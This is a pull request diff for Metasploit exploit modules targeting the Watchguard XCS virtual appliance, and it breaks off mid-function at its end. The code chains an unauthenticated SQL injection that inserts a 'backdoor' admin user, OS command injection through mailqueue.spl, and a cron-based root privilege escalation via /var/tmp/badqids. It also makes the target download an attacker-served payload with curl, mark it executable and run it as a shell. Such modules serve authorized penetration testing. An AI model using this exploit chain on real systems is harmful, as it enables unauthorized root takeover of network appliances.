### PR TITLE
Add Watchguard XCS unauthenticated remote root module.

### DIFF
--- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb
+++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb
@@ -36,6 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Platform'       => 'bsd',
       'Arch'           => ARCH_X86_64,
       'Privileged'     => false,
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
       'Targets'        =>
         [
           [ 'Watchguard XCS 9.2/10.0', { }]
@@ -53,6 +54,7 @@ class Metasploit4 < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The target URI', '/']),
         OptString.new('USERNAME', [true, 'Web interface user account to add', 'backdoor']),
         OptString.new('PASSWORD', [true, 'Web interface user password', 'backdoor']),
+        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
         Opt::RPORT(443)
       ],
       self.class
@@ -73,35 +75,17 @@ class Metasploit4 < Msf::Exploit::Remote
 
 
   def exploit
-    #Generate the password hash
-    pwd_clear = datastore['PASSWORD']
-    pwd_hash = generate_device_hash(pwd_clear)
-    username = datastore['USERNAME']
-    user_id = rand(999)
-
-    sid_cookie = attempt_login(username, pwd_clear)
-    unless sid_cookie
-      vprint_status("Failed to login, attempting to add backdoor user...")
-      unless add_user(user_id, username, pwd_hash, pwd_clear)
-        fail_with(Failure::Unknown, "Failed to add user account to database.")
-      end
-      sid_cookie = attempt_login(username, pwd_clear)
-      unless (sid_cookie)
-        fail_with(Failure::Unknown, "Unable to login with user account.")
-      end
-    end
+    #Get a valid session by logging in or exploiting SQLi to add user
+    @sid = get_session
 
     #Check if cmd injection works
-    test_cmd_inj = send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, "id")
+    test_cmd_inj = send_cmd_exec("/ADMIN/mailqueue.spl", "id")
     unless test_cmd_inj and test_cmd_inj.body =~ /uid=65534/
-      fail_with(Failure::UnexpectedReply, "Could not inject command")
+      fail_with(Failure::UnexpectedReply, "Could not inject command, may not be vulnerable")
     end
 
     #We have cmd exec, stand up an HTTP server and deliver the payload
     vprint_status("Getting ready to drop binary on appliance")
-
-    downfile = rand_text_alpha(8+rand(8))
-    vprint_status("File name is #{downfile}")
 
     #Generate payload
     @pl = generate_payload_exe
@@ -116,44 +100,11 @@ class Metasploit4 < Msf::Exploit::Remote
       end
     end
 
-    resource_uri = '/' + downfile
-
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-      srv_host = Rex::Socket.source_address(rhost)
-    else
-      srv_host = datastore['SRVHOST']
+    #Start the server and use primer to trigger fetching and running of the payload
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) {super}
+    rescue Timeout::Error
     end
-
-    service_url = 'https://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-    print_status("Starting up our web service on #{service_url} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-      on_request_uri(cli, req)
-      },
-      'Path' => resource_uri
-    }})
-
-    filename = rand_text_alpha_lower(8)
-    vprint_status("Asking the appliance to download #{service_url}")
-
-    #Use the cmd exec to pull in shell
-    dnld_cmd1 = "/usr/local/sbin/curl -k #{service_url} -o /tmp/#{filename}"
-    vprint_status("Telling appliance to run #{dnld_cmd1}")
-    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, dnld_cmd1)
-    register_file_for_cleanup("/tmp/#{filename}")
-
-    #Wait for payload to be requested by appliance
-    wait_for_payload
-
-    #Chmod the shell binary
-    chmod_cmd = "chmod +x /tmp/#{filename}"
-    vprint_status("Chmoding payload #{downfile}...")
-    send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, chmod_cmd)
-
-    exec_cmd = "/tmp/#{filename}"
-    vprint_status("Running payload #{downfile}...")
-    send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
-
   end
 
   def attempt_login(username,pwd_clear)
@@ -234,11 +185,14 @@ class Metasploit4 < Msf::Exploit::Remote
     return final_hash
   end
 
-  def send_cmd_exec(uri,sid_cookie,os_cmd, blocking=false)
-  #This is a handler function that makes HTTP calls to exploit the command injection issue
+  def send_cmd_exec(uri,os_cmd,blocking=false)
+    #This is a handler function that makes HTTP calls to exploit the command injection issue
+    unless @sid
+      fail_with(Failure::Unknown, "Missing a session cookie when attempting to execute command.")
+    end
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{uri}"),
-      'cookie' => "sid=#{sid_cookie}",
+      'cookie' => "sid=#{@sid}",
       'encode_params' => true,
       'vars_get' => {
         'f' => 'dnld',
@@ -254,23 +208,61 @@ class Metasploit4 < Msf::Exploit::Remote
     return res
   end
 
+  def get_session
+    #Gets a valid login session, either valid creds or the SQLi vulnerability
+    username = datastore['USERNAME']
+    pwd_clear = datastore['PASSWORD']
+    user_id = rand(999)
+
+    sid_cookie = attempt_login(username, pwd_clear)
+    unless sid_cookie
+      vprint_status("Failed to login, attempting to add backdoor user...")
+      pwd_hash = generate_device_hash(pwd_clear)
+      unless add_user(user_id, username, pwd_hash, pwd_clear)
+        fail_with(Failure::Unknown, "Failed to add user account to database.")
+      end
+
+      sid_cookie = attempt_login(username, pwd_clear)
+      unless (sid_cookie)
+          fail_with(Failure::Unknown, "Unable to login with user account.")
+      end
+
+    end
+    return sid_cookie
+  end
+
+  #Make the server download the payload and run it
+  def primer
+    vprint_status("Primer hook called, make the server get and run exploit")
+
+    #Gets the autogenerated uri from the mixin
+    payload_uri = get_uri
+
+    filename = rand_text_alpha_lower(8)
+    print_status("Sending download request for #{payload_uri}")
+
+    dnld_cmd1 = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
+    vprint_status("Telling appliance to run #{dnld_cmd1}")
+    send_cmd_exec("/ADMIN/mailqueue.spl",dnld_cmd1)
+    register_file_for_cleanup("/tmp/#{filename}")
+
+    chmod_cmd = "chmod +x /tmp/#{filename}"
+    vprint_status("Chmoding the payload...")
+    send_cmd_exec("/ADMIN/mailqueue.spl",chmod_cmd)
+
+    exec_cmd = "/tmp/#{filename}"
+    vprint_status("Running the payload...")
+    send_cmd_exec("/ADMIN/mailqueue.spl",exec_cmd,true)
+
+
+    print_status("Finished primer hook")
+  end
+
   #Handle incoming requests from the server
   def on_request_uri(cli, request)
     vprint_status("on_request_uri called: #{request.inspect}")
     print_status("Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
-  end
-
-  #Wait for the data to be sent
-  def wait_for_payload
-    waited = 0
-    while (not @elf_sent)
-      select(nil, nil, nil, 1)
-      waited += 1
-      if (waited > 10)
-        fail_with(Failure::Unknown, "Target didn't request the payload.")
-      end
-    end
   end
 end

--- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb
+++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb
@@ -16,14 +16,13 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Watchguard XCS Unauthenticated Remote Root',
+      'Name'           => 'Watchguard XCS Remote Command Execution',
       'Description'    => %q{
-        This module exploits three seperate vulnerabilities found in the Watchguard XCS virtual appliance
-        to gain a root shell. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
+        This module exploits two seperate vulnerabilities found in the Watchguard XCS virtual appliance
+        to gain command execution. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
         a valid web user into the appliance database, and login to the web interface as this user. A
-        vulnerability in the web interface allows the attack to inject operating system commands as the
-        'nobody' user. A further vulnerability in the 'FixCorruptMail' script called by root's crontab can then be exploited
-        to run a command as root within 3 minutes.
+        vulnerability in the web interface allows the attacker to inject operating system commands as the
+        'nobody' user. The watchguard_local_root module can then be used for local privesc to root.
       },
       'Author'         =>
         [
@@ -52,9 +51,8 @@ class Metasploit4 < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The target URI', '/']),
-        OptString.new('USERNAME', [true, 'Add web interface user account', 'backdoor']),
+        OptString.new('USERNAME', [true, 'Web interface user account to add', 'backdoor']),
         OptString.new('PASSWORD', [true, 'Web interface user password', 'backdoor']),
-        OptBool.new('GETROOT', [false, 'Exploit the root privesc (Takes up to 180 seconds)', true]),
         Opt::RPORT(443)
       ],
       self.class
@@ -152,15 +150,9 @@ class Metasploit4 < Msf::Exploit::Remote
     vprint_status("Chmoding payload #{downfile}...")
     send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, chmod_cmd)
 
-    if(datastore['GETROOT'] == true)
-      print_status("GETROOT set to true, we will use 'FixCorruptMail' privesc")
-      get_root(sid_cookie,filename)
-    else
-      print_status("GETROOT set to false, setting up a shell as 'nobody'")
-      exec_cmd = "/tmp/#{filename}"
-      vprint_status("Running payload #{downfile}...")
-      send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
-    end
+    exec_cmd = "/tmp/#{filename}"
+    vprint_status("Running payload #{downfile}...")
+    send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
 
   end
 
@@ -231,30 +223,6 @@ class Metasploit4 < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "Unable to add user to database")
     end
     return true
-  end
-
-  def get_root(sid_cookie,filename)
-    print_status("Rooting can take up to 3 minutes, if you want quicker access retry with GETROOT => false")
-
-    #Touch dummy file as part of privesc
-    dummy_filename = rand_text_alpha_lower(8)
-    touch_cmd="touch /tmp/#{dummy_filename}"
-    vprint_status("Creating dummy file...")
-    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, touch_cmd)
-
-    #Put the shell injection line into badqids
-    setup_privesc = "echo \"../../../../../../tmp/#{dummy_filename};/tmp/#{filename}\" > /var/tmp/badqids"
-    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, setup_privesc, true)
-
-    #Need both these files to exploit privesc, delete them once shell opened
-    register_file_for_cleanup("/var/tmp/badqids")
-    register_file_for_cleanup("/tmp/#{dummy_filename}")
-
-    #Wait for crontab to run vulnerable script
-    print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
-    select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
-    print_status("Ran out of time, should have root shell by now.")
-
   end
 
   def generate_device_hash(cleartext_password)

--- a/modules/exploits/freebsd/http/watchguard_remote_root.rb
+++ b/modules/exploits/freebsd/http/watchguard_remote_root.rb
@@ -1,0 +1,275 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+          'Name'           => 'Watchguard XCS Unauthenticated Remote Root',
+          'Description'    => %q{
+          This module exploits three seperate vulnerabilities found in the Watchguard XCS virtual appliance
+          to gain a root shell. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
+          a valid web user into the appliance database, and login to the web interface as this user. A
+          vulnerability in the web interface allows the attack to inject operating system commands as the
+          'nobody' user. A further vulnerability in the 'FixCorruptMail' script called by root's crontab can then be exploited
+          to run a command as root within 3 minutes.
+          },
+          'Author'         =>
+          [
+          'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
+          ],
+          'License'        => MSF_LICENSE,
+          'References'     =>
+          [
+            ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
+          ],
+          'Platform'       => 'bsd',
+          'Arch'           => ARCH_X86_64,
+          'Privileged'     => false,
+          'Targets'        =>
+          [
+            [ 'Watchguard XCS 9.2/10.0', { }]
+          ],
+          'DefaultOptions' =>
+          {
+            'SSL' => true
+          },
+          'DefaultTarget'  => 0,
+          'DisclosureDate' => 'June 29 2015'
+          ))
+
+    register_options(
+        [
+        OptString.new('TARGETURI', [true, 'The target URI', '/']),
+        OptBool.new('GETROOT', [false, 'Exploit the root privesc (Takes up to 180 seconds)', true]),
+        Opt::RPORT(443)
+        ],
+        self.class
+        )
+    end
+
+    def check
+    #Check to see if the SQLi is exploitable
+      res = send_request_cgi({
+         'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
+         'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
+         })
+     uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
+     vprint_status(uri1)
+     if res and res.body =~ /invalid input syntax for integer/
+       vprint_status("Looks vulnerable to the SQLi issue, probably fully vuln")
+       return Exploit::CheckCode::Vulnerable
+     else
+       vprint_status("**Sad trumpet sound**")
+       vprint_status(res)
+     return Exploit::CheckCode::Safe
+     end
+     end
+
+
+    def exploit
+      #Add the backdoor user to db
+      res = send_request_cgi({
+          'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
+         'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(99, 'backdoor', '0b75e2443d3c813d91ac5b91106a70ad', 0, 'server_admin', 0, 0)--"
+      })
+
+    if !res or !res.body
+      fail_with(Failure::Unreachable, "Could not connect to host")
+    end
+
+    if res.body =~ /ERROR:  duplicate key value violates unique constraint/
+      print_status("Added backdoor user, credentials => backdoor:backdoor")
+    else
+      fail_with(Failure::UnexpectedReply, "Unable to add backdoor user")
+    end
+
+
+    #Get the login hash/csrf thing needed to login
+    get_login_hash = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/login.spl')
+    })
+
+    #Find the hash token needed to login
+    login_hash = ''
+    vprint_status(get_login_hash.body)
+    get_login_hash.body.each_line do |line|
+    next if line !~ /name="hash" value="(.*)"/
+      login_hash = $1
+    end
+
+    sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
+
+    if login_hash == '' || sid_cookie == ''
+      fail_with(Failure::UnexpectedReply, "Could not find login hash or cookie")
+    end
+
+
+    login_post = {
+      'u' => 'backdoor',
+      'pwd' => 'backdoor',
+      'hash' => login_hash,
+      'login' => "Login"
+    }
+
+    print_status("Logging in with backdoor credentials")
+    login = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/login.spl'),
+      'method' => 'POST',
+      'encode_params' => false,
+      'cookie' => "sid=#{sid_cookie}",
+      'vars_post' => login_post,
+      'vars_get' => {
+      'f' => 'V',
+      }
+      })
+
+
+    if !login or login.body !~ /<title>Loading...<\/title>/
+      vprint_status(login.body)
+      fail_with(Failure::NoAccess, "Authentication failed")
+    end
+
+    print_status("Successfully logged in")
+
+    #Check if cmd injection works
+    test_cmd_inj = send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, "id")
+    if test_cmd_inj.body !~ /uid=65534/
+      fail_with(Failure::UnexpectedReply, "Could not inject command")
+    end
+
+    #We have cmd exec, stand up an HTTP server and deliver the payload
+    print_status("Getting ready to drop binary on appliance")
+
+    downfile = rand_text_alpha(8+rand(8))
+    vprint_status("File name is #{downfile}")
+
+    @pl = generate_payload_exe
+    @elf_sent = false
+
+    resource_uri = '/' + downfile
+
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    service_url = 'https://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+    print_status("Starting up our web service on #{service_url} ...")
+    start_service({'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
+    }})
+
+    filename = rand_text_alpha_lower(8)
+    vprint_status("Asking the appliance to download #{service_url}")
+
+    #Use the cmd exec to pull in shell
+    dnld_cmd1 = "/usr/local/sbin/curl -k #{service_url} -o /tmp/#{filename}"
+    vprint_status("Telling appliance to run #{dnld_cmd1}")
+    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, dnld_cmd1)
+    register_file_for_cleanup("/tmp/#{filename}")
+
+    #wait for payload download
+    wait_for_payload
+
+    #Chmod the shell binary
+    chmod_cmd = "chmod +x /tmp/#{filename}"
+    print_status("Chmoding payload #{downfile}...")
+    send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, chmod_cmd)
+
+    if(datastore['GETROOT'] == true)
+      print_status("GETROOT set to true, we will use 'FixCorruptMail' privesc")
+      get_root(sid_cookie,filename)
+    else
+      print_status("GETROOT set to false, setting up a shell as 'nobody'")
+
+      #exec revshell straight away
+      exec_cmd = "/tmp/#{filename}"
+      print_status("Running payload #{downfile}...")
+      send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
+    end
+
+  end
+
+  def get_root(sid_cookie,filename)
+    print_status("Rooting can take up to 3 minutes, if you want quicker access retry with GETROOT => false")
+
+    #Touch dummy file as part of privesc
+    touch_cmd="touch /tmp/dummyfile"
+    vprint_status("Creating dummy file...")
+    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, touch_cmd)
+
+    #Put the shell injection line into badqids
+    setup_privesc = "echo \"../../../../../../tmp/dummyfile;/tmp/#{filename}\" > /var/tmp/badqids"
+    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, setup_privesc, true)
+
+    #Need both these files to exploit privesc, delete them once shell opened
+    register_file_for_cleanup("/var/tmp/badqids")
+    register_file_for_cleanup("/tmp/dummyfile")
+
+    #Wait for crontab to run vulnerable script
+    print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
+    select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
+    print_status("Ran out of time, should have root shell by now.")
+
+  end
+
+  def send_cmd_exec(uri,sid_cookie,os_cmd, blocking=false)
+  #This is a handler function that makes HTTP calls to exploit the command injection issue
+    res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, "#{uri}"),
+        'cookie' => "sid=#{sid_cookie}",
+        'encode_params' => true,
+        'vars_get' => {
+          'f' => 'dnld',
+          'id' => ";#{os_cmd}"
+        }
+    })
+
+    #Handle cmd exec failures
+    if (!res and blocking == false)
+      fail_with(Failure::Unknown, "Unable to deploy payload")
+    else
+      return res
+    end
+  end
+
+    # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    vprint_status("on_request_uri called: #{request.inspect}")
+    if (not @pl)
+      print_error("A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  #Wait for the data to be sent
+  def wait_for_payload
+    waited = 0
+    while (not @elf_sent)
+      select(nil, nil, nil, 1)
+      waited += 1
+      if (waited > 10)
+        fail_with(Failure::Unknown, "Target didn't request the payload.")
+      end
+    end
+  end
+end

--- a/modules/exploits/freebsd/http/watchguard_remote_root.rb
+++ b/modules/exploits/freebsd/http/watchguard_remote_root.rb
@@ -261,8 +261,8 @@ class Metasploit4 < Msf::Exploit::Remote
     #Generates the specific hashes needed for the XCS
     pre_salt = "BorderWare "
     post_salt = " some other random (9) stuff"
-    hash_tmp = Digest::MD5.hexdigest (pre_salt + cleartext_password + post_salt)
-    final_hash = Digest::MD5.hexdigest (cleartext_password + hash_tmp)
+    hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)
+    final_hash = Rex::Text.md5(cleartext_password + hash_tmp)
     return final_hash
   end
 

--- a/modules/exploits/freebsd/http/watchguard_remote_root.rb
+++ b/modules/exploits/freebsd/http/watchguard_remote_root.rb
@@ -6,7 +6,7 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
@@ -16,145 +16,107 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-          'Name'           => 'Watchguard XCS Unauthenticated Remote Root',
-          'Description'    => %q{
-          This module exploits three seperate vulnerabilities found in the Watchguard XCS virtual appliance
-          to gain a root shell. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
-          a valid web user into the appliance database, and login to the web interface as this user. A
-          vulnerability in the web interface allows the attack to inject operating system commands as the
-          'nobody' user. A further vulnerability in the 'FixCorruptMail' script called by root's crontab can then be exploited
-          to run a command as root within 3 minutes.
-          },
-          'Author'         =>
-          [
+      'Name'           => 'Watchguard XCS Unauthenticated Remote Root',
+      'Description'    => %q{
+        This module exploits three seperate vulnerabilities found in the Watchguard XCS virtual appliance
+        to gain a root shell. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
+        a valid web user into the appliance database, and login to the web interface as this user. A
+        vulnerability in the web interface allows the attack to inject operating system commands as the
+        'nobody' user. A further vulnerability in the 'FixCorruptMail' script called by root's crontab can then be exploited
+        to run a command as root within 3 minutes.
+      },
+      'Author'         =>
+        [
           'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
-          ],
-          'License'        => MSF_LICENSE,
-          'References'     =>
-          [
-            ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
-          ],
-          'Platform'       => 'bsd',
-          'Arch'           => ARCH_X86_64,
-          'Privileged'     => false,
-          'Targets'        =>
-          [
-            [ 'Watchguard XCS 9.2/10.0', { }]
-          ],
-          'DefaultOptions' =>
-          {
-            'SSL' => true
-          },
-          'DefaultTarget'  => 0,
-          'DisclosureDate' => 'Jun 29 2015'
-          ))
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
+        ],
+      'Platform'       => 'bsd',
+      'Arch'           => ARCH_X86_64,
+      'Privileged'     => false,
+      'Targets'        =>
+        [
+          [ 'Watchguard XCS 9.2/10.0', { }]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 29 2015'
+    ))
 
     register_options(
-        [
+      [
         OptString.new('TARGETURI', [true, 'The target URI', '/']),
+        OptString.new('USERNAME', [true, 'Add web interface user account', 'backdoor']),
+        OptString.new('PASSWORD', [true, 'Web interface user password', 'backdoor']),
         OptBool.new('GETROOT', [false, 'Exploit the root privesc (Takes up to 180 seconds)', true]),
         Opt::RPORT(443)
-        ],
-        self.class
-        )
-    end
+      ],
+      self.class
+    )
+  end
 
-    def check
-    #Check to see if the SQLi is exploitable
-      res = send_request_cgi({
-         'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
-         'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
-         })
-     uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
-     if res and res.body =~ /invalid input syntax for integer/
-       vprint_status("Looks vulnerable to the SQLi issue, probably fully vulnerable")
+  def check
+    #Check to see if the SQLi is present
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
+      'cookie' => "sid=1'"
+     })
+     if res and res.body =~ /unterminated quoted string/
        return Exploit::CheckCode::Vulnerable
-     else
-       vprint_status("**Sad trumpet sound**")
-       vprint_status(res)
+     end
      return Exploit::CheckCode::Safe
-     end
-     end
+  end
 
 
-    def exploit
-      #Add the backdoor user to db
-      res = send_request_cgi({
-          'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
-         'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(99, 'backdoor', '0b75e2443d3c813d91ac5b91106a70ad', 0, 'server_admin', 0, 0)--"
-      })
+  def exploit
+    #Generate the password hash
+    pwd_clear = datastore['PASSWORD']
+    pwd_hash = generate_device_hash(pwd_clear)
+    username = datastore['USERNAME']
+    user_id = rand(999)
 
-    if !res or !res.body
-      fail_with(Failure::Unreachable, "Could not connect to host")
+    sid_cookie = attempt_login(username, pwd_clear)
+    unless sid_cookie
+      vprint_status("Failed to login, attempting to add backdoor user...")
+      unless add_user(user_id, username, pwd_hash, pwd_clear)
+        fail_with(Failure::Unknown, "Failed to add user account to database.")
+      end
+      sid_cookie = attempt_login(username, pwd_clear)
+      unless (sid_cookie)
+        fail_with(Failure::Unknown, "Unable to login with user account.")
+      end
     end
-
-    if res.body =~ /ERROR:  duplicate key value violates unique constraint/
-      print_status("Added backdoor user, credentials => backdoor:backdoor")
-    else
-      fail_with(Failure::UnexpectedReply, "Unable to add backdoor user")
-    end
-
-
-    #Get the login hash/csrf thing needed to login
-    get_login_hash = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/login.spl')
-    })
-
-    #Find the hash token needed to login
-    login_hash = ''
-    get_login_hash.body.each_line do |line|
-    next if line !~ /name="hash" value="(.*)"/
-      login_hash = $1
-    end
-
-    sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
-
-    if login_hash == '' || sid_cookie == ''
-      fail_with(Failure::UnexpectedReply, "Could not find login hash or cookie")
-    end
-
-
-    login_post = {
-      'u' => 'backdoor',
-      'pwd' => 'backdoor',
-      'hash' => login_hash,
-      'login' => "Login"
-    }
-
-    print_status("Logging in with backdoor credentials")
-    login = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/login.spl'),
-      'method' => 'POST',
-      'encode_params' => false,
-      'cookie' => "sid=#{sid_cookie}",
-      'vars_post' => login_post,
-      'vars_get' => {
-      'f' => 'V',
-      }
-      })
-
-
-    if !login or login.body !~ /<title>Loading...<\/title>/
-      vprint_status(login.body)
-      fail_with(Failure::NoAccess, "Authentication failed")
-    end
-
-    print_status("Successfully logged in")
 
     #Check if cmd injection works
     test_cmd_inj = send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, "id")
-    if test_cmd_inj.body !~ /uid=65534/
+    unless test_cmd_inj and test_cmd_inj.body =~ /uid=65534/
       fail_with(Failure::UnexpectedReply, "Could not inject command")
     end
 
     #We have cmd exec, stand up an HTTP server and deliver the payload
-    print_status("Getting ready to drop binary on appliance")
+    vprint_status("Getting ready to drop binary on appliance")
 
     downfile = rand_text_alpha(8+rand(8))
     vprint_status("File name is #{downfile}")
 
+    #Generate payload
     @pl = generate_payload_exe
     @elf_sent = false
+    waited = 0
+    while (not @pl)
+      print_status("Waiting for payload to finish generating...")
+      select(nil,nil,nil,1)
+      waited += 1
+      if (waited > 20)
+        fail_with(Failure::Unknown, "Unable to generate payload within a reasonable time.")
+      end
+    end
 
     resource_uri = '/' + downfile
 
@@ -167,10 +129,10 @@ class Metasploit3 < Msf::Exploit::Remote
     service_url = 'https://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
     print_status("Starting up our web service on #{service_url} ...")
     start_service({'Uri' => {
-        'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-        },
-        'Path' => resource_uri
+      'Proc' => Proc.new { |cli, req|
+      on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
     }})
 
     filename = rand_text_alpha_lower(8)
@@ -182,12 +144,12 @@ class Metasploit3 < Msf::Exploit::Remote
     send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, dnld_cmd1)
     register_file_for_cleanup("/tmp/#{filename}")
 
-    #wait for payload download
+    #Wait for payload to be requested by appliance
     wait_for_payload
 
     #Chmod the shell binary
     chmod_cmd = "chmod +x /tmp/#{filename}"
-    print_status("Chmoding payload #{downfile}...")
+    vprint_status("Chmoding payload #{downfile}...")
     send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, chmod_cmd)
 
     if(datastore['GETROOT'] == true)
@@ -195,30 +157,98 @@ class Metasploit3 < Msf::Exploit::Remote
       get_root(sid_cookie,filename)
     else
       print_status("GETROOT set to false, setting up a shell as 'nobody'")
-
-      #exec revshell straight away
       exec_cmd = "/tmp/#{filename}"
-      print_status("Running payload #{downfile}...")
+      vprint_status("Running payload #{downfile}...")
       send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
     end
 
+  end
+
+  def attempt_login(username,pwd_clear)
+    #Attempts to login with the provided user credentials
+    #Get the login page
+    get_login_hash = send_request_cgi({
+    'uri' => normalize_uri(target_uri.path, '/login.spl')
+    })
+
+    unless get_login_hash and get_login_hash.body
+      fail_with(Failure::Unreachable, "Could not get login page.")
+    end
+
+    #Find the hash token needed to login
+    login_hash = ''
+    get_login_hash.body.each_line do |line|
+    next if line !~ /name="hash" value="(.*)"/
+      login_hash = $1
+    end
+
+    sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
+    if login_hash == '' || sid_cookie == ''
+      fail_with(Failure::UnexpectedReply, "Could not find login hash or cookie")
+    end
+
+    login_post = {
+      'u' => "#{username}",
+      'pwd' => "#{pwd_clear}",
+      'hash' => login_hash,
+      'login' => "Login"
+    }
+    print_status("Attempting to login with provided credentials")
+    login = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/login.spl'),
+      'method' => 'POST',
+      'encode_params' => false,
+      'cookie' => "sid=#{sid_cookie}",
+      'vars_post' => login_post,
+      'vars_get' => {
+        'f' => 'V'
+      }
+    })
+
+
+    unless login and login.body =~ /<title>Loading...<\/title>/
+      return false
+    end
+
+    print_status("Successfully logged in")
+    return sid_cookie
+  end
+
+  def add_user(user_id, username, pwd_hash, pwd_clear)
+    #Adds a user to the database using the unauthed SQLi
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
+      'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
+    })
